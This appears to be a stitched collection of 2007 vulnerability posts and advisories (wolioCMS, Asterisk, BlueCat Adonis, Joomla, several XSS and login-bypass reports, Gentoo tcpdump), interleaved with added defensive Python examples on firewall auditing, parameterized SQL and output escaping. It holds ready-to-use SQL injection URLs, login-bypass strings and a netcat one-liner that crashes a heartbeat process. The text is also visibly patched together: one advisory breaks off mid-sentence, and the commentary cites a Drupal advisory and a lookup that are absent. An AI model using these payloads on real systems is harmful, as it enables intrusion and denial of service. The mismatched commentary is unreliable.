$sql="select * from member where member_email='$uid' and member_password='$pwd' and member_active='yes' ";

The $uid variable is not properly filtered, so it can be manipulated by the user.

exploit;

SQL Injection
http://localhost/_woliocms/member.php?member=admin&act=page&id='/**/UNION/**/ALL/**/SELECT/**/null,null,concat(member_email,'-',member_password),null,null,null,null,null,null,null/**/FROM/**/member/*

Bypass Administrator Login
http://localhost/_woliocms/admin/
Login Page
Email; '/**/UNION/**/ALL/**/SELECT/**/member_id,member_email,member_password,member_realname,member_urlname,member_themes,member_groups_id,member_register_date,member_active,member_activation_code/**/FROM/**/member/*
Password; Blank [just click login]

Thanks;
str0ke
xoron [www.xoron.biz]
y3dips [y3d1ps.blogspot.com]
-newhack[dot]org|staff- mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX
--- all members of newhack[dot]org
--- all members of echo.or.id
--- and not forgetting anavrin [keep up the good work, bro], and ical, who has just recovered
ASA-2007-018: Resource exhaustion vulnerability in IAX2 channel driver
Asterisk Project Security Advisory - ASA-2007-018

Product            : Asterisk
Summary            : Resource Exhaustion vulnerability in IAX2 channel driver
Nature of Advisory : Denial of Service
Susceptibility     : Remote Unauthenticated Sessions
Severity           : Moderate
Exploits Known     : No
Reported On        : July 19, 2007
Reported By        : Russell Bryant, Digium, Inc. <[EMAIL PROTECTED]>
Posted On          : July 23, 2007
Last Updated On    : July 25, 2007
Advisory Contact   : Russell Bryant <[EMAIL PROTECTED]>
CVE Name           :

Description

The IAX2 channel driver in Asterisk is vulnerable to a Denial of Service attack when configured to allow unauthenticated calls. An attacker can send a flood of NEW packets for valid extensions to the server to initiate calls as the unauthenticated user. This will cause resources on the Asterisk system to get allocated that will never go away. Furthermore, the IAX2 channel driver will be stuck trying to reschedule retransmissions for each of these fake calls forever. This can very quickly bring down a system and the only way to recover is to restart Asterisk.

Detailed Explanation:

Within the last few months, we made some changes to chan_iax2 to combat the abuse of this module for traffic amplification attacks. Unfortunately, this has caused an unintended side effect.

The summary of the change to combat traffic amplification is this. Once you start the PBX on the Asterisk channel, it will begin receiving frames to be sent back out to the network. We delayed this from happening until a 3-way handshake has occurred to help ensure that we are talking to the IP address the messages appear to be coming from.

When chan_iax2 accepts an unauthenticated call, it immediately creates the ast_channel for the call. However, since the 3-way handshake has not been completed, the PBX is not started on this channel.

Later, when the maximum number of retries has been exceeded on responses to this NEW, the code tries to hang up the call. Now, it has 2 ways to do this, depending on if there is an ast_channel related to this I
TS-2007-001-0: BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability
Template Security Security Advisory
-----------------------------------

BlueCat Networks Adonis Linux-HA heartbeat DoS Vulnerability

Date: 2007-07-29
Advisory ID: TS-2007-001-0
Vendor: BlueCat Networks, http://www.bluecatnetworks.com/
Revision: 0

Contents
--------
Summary
Software Version
Details
Impact
Exploit
Workarounds
Obtaining Patched Software
Credits
Revision History

Summary
-------
Template Security has discovered a serious Denial of Service (DoS) vulnerability in the BlueCat Networks Adonis DNS/DHCP Appliance. When XHA is configured to place two Adonis servers in an active-passive pair to provide high availability, a remote attacker can transmit a single UDP datagram to crash the heartbeat control process. This can be used for example to create an active/active condition in the cluster pair.

Software Version
----------------
Adonis version 5.0.2.8 was tested, and XHA was configured using the Proteus IPAM appliance. It is possible any version of Adonis using heartbeat version 1.2.4 or earlier is vulnerable.

Details
-------
XHA on Adonis uses the heartbeat software from the Linux-HA project (http://www.linux-ha.org/). On the version of Adonis we tested, heartbeat version 1.2.3 is used. This version is vulnerable to a well-known remote DoS attack which was announced on 2006-08-13:

http://www.linux-ha.org/_cache/SecurityIssues__sec03.txt

Impact
------
Successful exploitation of the vulnerability will result in a DoS condition affecting critical DNS and DHCP services.

Exploit
-------
In this example the XHA cluster is composed of:

node-1: 192.168.1.12
node-2: 192.168.1.13
VIP:    192.168.1.11

A remote attacker can perform the following to crash the heartbeat control process on node-1:

$ perl -e 'print "###\n2147483647heart attack:%%%\n"' | nc -u 192.168.1.12 694

If node-1 is the active node in the cluster, node-2 will take over the VIP and the cluster will be in an active/active condition.

Other scenarios are possible, such as crashing the control process on the passive node to prevent it from being able to assume the active role in a failure condition.

Note that the iptables configuration on Adonis does not block packets to 694/udp; there is an explicit policy to permit port 694/udp from any to any in the INPUT and OUTPUT chain. To verify this, you can login as root on the appliance and view the firewall configuration script:

# grep 694 /usr/local/bluecat/doFirewall
iptables -A INPUT -p udp --dport 694 -j ACCEPT
iptables -A OUTPUT -p udp --dport 694 -j ACCEPT
$IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT
$IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT

Workarounds
-----------
The attack can be prevented by blocking packets to 694/udp. This can be performed at a firewall and by modifying the iptables configuration on the Adonis appliances. Appropriate anti-spoofing policies must also be in place, because an attacker can spoof the source IP address in the UDP datagram.

When XHA was configured, iptables rules were configured in /usr/local/bluecat/firewall_rules/localHAFirewallConfig to permit 694/udp to and from the peer node on each appliance. However, these rules have no effect due to the rules mentioned above. And they are also incorrect because they specify source port 694/udp, and the heartbeat packets we observed do not use a fixed source port.

One possible workaround which may be used to temporarily prevent the attack is to comment out the 694/udp rules in the firewall startup script then repair the rules in localHAFirewallConfig. However, localHAFirewallConfig can be overwritten by /usr/local/bluecat/configLocalFirewall.sh. Due to this, we recommend that customers do not modify the iptables configuration, and block 694/udp and perform anti-spoofing at a firewall.

Obtaining Patched Software
--------------------------
Contact the vendor.

Credits
-------
forloop discovered that Adonis XHA was using vulnerable heartbeat software, and defaultroute read the heartbeat code to discover the exploit. Both are members of Template Security.

Revision History
----------------
2007-07-29: Revision 0 released
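The Workarounds section describes two firewall mistakes that together expose heartbeat: an any-to-any ACCEPT for 694/udp that shadows the peer rules, and peer rules that pin a source port heartbeat does not use. The audit below is an added example, not BlueCat or Linux-HA code, that reads iptables rule lines in the form the advisory's grep output shows and reports both mistakes plus the shadowing. The four doFirewall lines are the advisory's own; the two peer rules are constructed in the shape the advisory describes, and the peer address 192.168.1.13 is the advisory's node-2.

```python
import shlex

# The advisory's doFirewall excerpt, followed by two constructed peer rules:
# one in the faulty localHAFirewallConfig shape (source port pinned) and one corrected.
FIREWALL_LINES = [
    "iptables -A INPUT -p udp --dport 694 -j ACCEPT",
    "iptables -A OUTPUT -p udp --dport 694 -j ACCEPT",
    "$IP6TABLES -A INPUT -p udp --dport 694 -j ACCEPT",
    "$IP6TABLES -A OUTPUT -p udp --dport 694 -j ACCEPT",
    "iptables -A INPUT -p udp -s 192.168.1.13 --sport 694 --dport 694 -j ACCEPT",   # constructed
    "iptables -A INPUT -p udp -s 192.168.1.13 --dport 694 -j ACCEPT",               # constructed, corrected
]

VALUE_OPTS = {"-A", "-p", "-s", "-d", "-j", "-i", "-o", "--dport", "--sport"}


def parse_rule(line):
    """Return {'bin': ..., option: value, ...} for one iptables/ip6tables invocation.

    Only the value-taking options above are understood; negations ('!') and match
    extensions are left out, which is enough for the rule shapes under discussion.
    """
    toks = shlex.split(line)
    rule = {"bin": toks[0]}
    i = 1
    while i < len(toks):
        if toks[i] in VALUE_OPTS and i + 1 < len(toks):
            rule[toks[i]] = toks[i + 1]
            i += 2
        else:
            i += 1
    return rule


def audit_heartbeat_rules(lines, peer, port="694"):
    """List (line index, reason) for INPUT rules that accept the heartbeat port unsafely."""
    findings = []
    open_bins = set()   # binaries (iptables / $IP6TABLES) that already have an any-source ACCEPT
    for idx, line in enumerate(lines):
        r = parse_rule(line)
        if (r.get("-A"), r.get("-p"), r.get("--dport"), r.get("-j")) != ("INPUT", "udp", port, "ACCEPT"):
            continue
        if "-s" not in r:
            findings.append((idx, "accepts %s/udp from any source" % port))
            open_bins.add(r["bin"])
        elif "--sport" in r:
            findings.append((idx, "peer rule pins source port %s, which heartbeat does not use" % r["--sport"]))
        elif r["-s"] == peer and r["bin"] in open_bins:
            findings.append((idx, "peer-restricted rule is shadowed by an earlier any-source rule"))
    return findings


if __name__ == "__main__":
    for idx, reason in audit_heartbeat_rules(FIREWALL_LINES, peer="192.168.1.13"):
        print(f"line {idx}: {reason}: {FIREWALL_LINES[idx]}")
```

Because iptables matches first rule first, even a correct peer-only rule is inert while the any-source ACCEPT precedes it; the audit reports that ordering separately so the corrected rule is not mistaken for a fix on its own. As the advisory notes, source restrictions on UDP also need anti-spoofing upstream.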
[EMAIL PROTECTED]
Hello

Joomla multiple vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : [EMAIL PROTECTED]

Affected Versions
1.0.X -> tested on 1.0.12
1.5 maybe affected -> not tested but probably affected

sql injection
administrator/popups/pollwindow.php?pollid=1%20union%20select%20password%20from%20jos_users/*

Full path
Many many in includes/
Examples
includes/Cache/Lite/Output.php
includes/patTemplate/patTemplate/Stat.php
includes/patTemplate/patTemplate/OutputFilter.php
includes/patTemplate/patTemplate/OutputCache.php
includes/patTemplate/patTemplate/Modifier.php
includes/patTemplate/patTemplate/Reader.php
includes/patTemplate/patTemplate/TemplateCache.php
.. ETC

GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD , Le Copra;
Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS;

End of it :)
WwW.SoQoR.NeT
[Aria-security] community Cross-site Scripting (XSS)
[Aria-Security]
# Title: community Cross-site Scripting (XSS)
#
# < Author: You_You >
# < Software: Commute (The best community) >
# < Site Script: http://sourceforge.net/projects/commutese/ >

Proof of Concept:
local/[path]/require/small_head.php?retun=[Xss-script]
E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL
_ A R I A - S E C U R I T Y _

Vendor: http://www.e-commercescripts.com/dotnet/

E-commerceScripts ALL Apps (Auction Script, Shopping Cart Script and Multi-Vendor E-Shop Script) admin.aspx SQL Injection

Username: anything' OR 'x'='x
password: whatever you want (or anything' OR 'x'='x)

Credits: Aria-Security Team
http://aria-security.net
http://outlaw.aria-security.info [PERSONAL BLOG]
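The wolioCMS post (the `member_email='$uid' and member_password='$pwd'` query), the Joomla pollid injection and the admin.aspx login bypass above are all the same defect: attacker text spliced into SQL. The following is an added example, not code from any of those products, that reproduces the wolioCMS login query against an in-memory SQLite table in both forms, string-built and parameterized, so the difference can be asserted rather than argued. The table, the row and the placeholder password are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed table in the shape of the wolioCMS 'member' query."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE member (member_id INTEGER, member_email TEXT, "
               "member_password TEXT, member_active TEXT)")
    db.execute("INSERT INTO member VALUES (1, 'admin@example.invalid', "
               "'hashed-pw-placeholder', 'yes')")
    return db


def login_concat(db, uid, pwd):
    """The pattern from the post: values interpolated straight into the statement.

    With uid = "anything' OR 'x'='x" the WHERE clause becomes
      member_email='anything' OR 'x'='x' and member_password=... OR 'x'='x' and member_active='yes'
    and AND binds tighter than OR, so the final OR-branch is true for every active row.
    """
    sql = (f"select * from member where member_email='{uid}' and "
           f"member_password='{pwd}' and member_active='yes'")
    return db.execute(sql).fetchone()


def login_param(db, uid, pwd):
    """Same query with bound parameters: the driver sends values out of band, so a quote
    in the input is data, never syntax. magic_quotes_gpc is irrelevant here."""
    sql = ("select * from member where member_email=? and member_password=? "
           "and member_active='yes'")
    return db.execute(sql, (uid, pwd)).fetchone()


BYPASS = "anything' OR 'x'='x"     # the string from the admin.aspx post above


if __name__ == "__main__":
    db = make_db()
    print("concatenated:", login_concat(db, BYPASS, BYPASS))
    print("parameterized:", login_param(db, BYPASS, BYPASS))
```

A real login would also hash the submitted password and compare server-side rather than match a stored plaintext in SQL; the placeholder column here only keeps the query shape the post shows. The same `?` binding applies to the `pages_id` and `pollid` lookups, where the injected text is a UNION rather than an OR.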
[Aria-security] itcms 0.2 Cross-site Scripting (XSS)
[Aria-Security]
# Title: itcms 0.2 Cross-site Scripting (XSS)
#
# < Author: You_You >
# < Software: itcms >
# < Site Script: http://sourceforge.net/projects/itcms/ >

Proof of Concept:
local/[path]/lang-en.php?wndtitle=[Xss-script]
local/[path]/menu-ed.php?wndtitle=[Xss-script]
local/[path]/titletext-ed.php?wndtitle=[Xss-script]
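The two Aria-Security posts (`wndtitle`, `retun`) and DRUPAL-SA-2007-018 above describe the same reflected XSS shape: a request parameter or a server variable such as the request URI is written into the page unescaped. The following is an added example, not code from itcms, Commute or Drupal, that renders a window title and a form action both ways and includes a regression check that the raw probe string does not survive into the output. The probe string and the paths are constructed.

```python
import html


def render_window_title_unsafe(wndtitle):
    """The pattern the posts describe: the parameter is echoed into markup as-is."""
    return f"<html><head><title>{wndtitle}</title></head></html>"


def render_window_title(wndtitle):
    """HTML text context: escape &, <, > (quote=True also covers attribute context)."""
    return f"<html><head><title>{html.escape(wndtitle, quote=True)}</title></head></html>"


def render_form(request_uri):
    """Server variables are attacker-influenced too (the DRUPAL-SA-2007-018 case): the
    request URI lands inside a quoted attribute, so quotes must be escaped as well."""
    return f'<form action="{html.escape(request_uri, quote=True)}" method="post"></form>'


def survives_unescaped(rendered, probe):
    """Regression check for a template: True if the probe appears verbatim in the output."""
    return probe in rendered


# Constructed probe: closes the title element and opens a script element if not escaped.
PROBE = '</title><script>alert(1)</script>'
```

Escaping is done at output time, per context, rather than by stripping on input: the same `wndtitle` value may later be placed in an attribute or a script block, and each context has its own rules.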
[ GLSA 200707-14 ] tcpdump: Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            Gentoo Linux Security Advisory                           GLSA 200707-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: tcpdump: Integer overflow
      Date: July 28, 2007
      Bugs: #184815
        ID: 200707-14

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in tcpdump, allowing for the execution of arbitrary code, possibly with root privileges.

Background
==========

tcpdump is a tool for capturing and inspecting network traffic.

Affected packages
=================

    -------------------------------------------------------------------
     Package                /  Vulnerable  /               Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/tcpdump        < 3.9.5-r3                >= 3.9.5-r3

Description
===========

mu-b from Digital Labs discovered that the return value of a snprintf() call is not properly checked before being used. This could lead to an integer overflow.

Impact
======

A remote attacker could send specially crafted BGP packets on a network being monitored with tcpdump, possibly resulting in the execution of arbitrary code with the privileges of the user running tcpdump, which is usually root.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All tcpdump users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/tcpdump-3.9.5-r3"

References
==========

  [ 1 ] CVE-2007-3798
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200707-14.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5